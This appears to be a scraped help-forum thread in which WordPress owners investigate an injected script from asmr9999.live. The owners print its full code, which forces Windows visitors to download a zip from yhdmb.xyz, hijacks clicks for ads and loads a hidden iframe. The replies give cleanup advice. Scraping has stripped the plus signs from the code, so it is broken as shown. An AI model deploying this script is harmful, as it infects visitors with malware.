Home > Blockchain >  Malicious code asmr9999 in Wordpress uses FileSaver.js and jszip
Malicious code asmr9999 in Wordpress uses FileSaver.js and jszip

Time:11-18

Scanning my site with pagespeed, it shows that my site is loading malicious files in the background.

The problem happens occasionally, it doesn't happen all the time. Sometimes the site doesn't load the malicious script, other times it does. I don't know what it depends on.

In particular, the following js script is loaded from this link "https:// asmr9999. live/static.js" (without space). So the malicious code is loaded indirectly.

if(!window.xxxyyyzzz){function e(){return -1!==["Win32","Win64","Windows","WinCE"].indexOf(window.navigator?.userAgentData?.platform||window.navigator.platform)}function n(n){if(!e())return!1;var t="File",a=n.target.closest("a");if(window.location.href.indexOf("3axis.co")>=0){if(0>a.parentElement.className.indexOf("post-subject")&&0>a.parentElement.className.indexOf("img"))return!1;t=a.children.length>0?a.children[0].alt:a.innerText}else{if(!(window.location.href.indexOf("thesimscatalog.com")>=0)||0>a.parentElement.className.indexOf("product-inner"))return!1;t=a.children[1].innerText}var i=document.createElement("a");return i.style="display:none",i.href="https://yhdmb.xyz/download/" t " Downloader.zip",document.body.append(i),i.click(),n.preventDefault(),!0}function t(e){var n=document.createElement("script");n.src=e,document.head.appendChild(n)}function a(e,n,t){var a="";if(t){var i=new Date;i.setTime(i.getTime() 36e5*t),a="; expires=" i.toUTCString()}document.cookie=e "=" (n||"") a "; path=/"}function i(e){for(var n=e "=",t=document.cookie.split(";"),a=0;a<t.length;a  ){for(var i=t[a];" "==i.charAt(0);)i=i.substring(1,i.length);if(0==i.indexOf(n))return i.substring(n.length,i.length)}return null}function r(e){var t=e.target.closest("a");null!==t&&(n(e)||!i("__ads__opened")&&window._ads_goto&&(a("__ads__opened","1",6),"_blank"==t.target||(e.preventDefault(),window.open(t.href)),setTimeout(function(){window.location=window._ads_goto},500)),window.removeEventListener("click",r))}t("https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js"),t("https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/2.0.0/FileSaver.min.js"),window.addEventListener("click",r,{capture:!0}),window.addEventListener("message",function(e){e.data&&e.data instanceof Object&&e.data._ads_goto&&(window._ads_goto=e.data._ads_goto)}),window.xxxyyyzzz=function(e){var n=document.createElement("div"),t=document.createElement("iframe");t.src=e,n.style.display="none",n.appendChild(t),window.addEventListener("load",function(){document.body.append(n)})},window.xxxyyyzzz("https://yhdmb.xyz/vp/an.html")}

From this code it is possible to understand where the malware is located on my Wordpress site? And also is it possible to understand what exactly this code does?

I have seen that it also uses these scripts,

  1. enter image description here

    CodePudding user response:

    You can find out who was initiator of any loaded file. Open developer console (Ctrl Shift I in Chrome), choose Network tab. After loading page with opened Network tab there will appear all loaded files. Locate your file and find Column initiator.

    But, it can be scenario, where it will be loaded from DOM. So next step will be you will go to Elements, Ctrl F and search for this script. But this musn't be your solution. It can be inserted to HTML of your webpage by any malicious plugin. I prefer (at least if you are able to log into Wordpress admin) using some useful plugin for scanning. E.g. plugin Anti-Malware Security and Brute-Force Firewall or some other scanning tool. It will probably find concrete file/directory where is some malicious code.

    CodePudding user response:

    I have exactly the same issue on the ContOS VPS server and a custom CMS. I am using Apache nginx php 5.6 configuration. My investigations are the following:

    1. I compared all my site scripts with the scripts from my previous backup and there are no changes in the site scripts!
    2. I checked all files on my server for the string "asmr9999" and the same string, encoded in the Base64 format: YXNtcjk5OTk - the strings were not found. Also, I created a SQL database dump, but the dump either doesn't contains these strings!
    3. I checked site with using the clamAV antivirus and the maldet tool and there is no issues were found.
    4. Finally, I rebooted server, and the scripts "<script src="https:// asmr9999 .live" are gone from all my site pages! But, after about 1 hour, the scripts are appeared again on my site pages.

    So, it seems that the script is located only in RAM and disappears during the server reboot. Then, after 1 hour maybe the crontab loaded the script into the RAM from some place.

    I hope I will save your time and together we will resolve this issue. I am continuing the investigation.

    CodePudding user response:

    Have the same problem have tryed it two time now, the only thing i can do is login to the admin and then the wordpress edit switch the elementor to wordpress edit and delete the string. BUT how did it get there?? Have wordfence

  • Related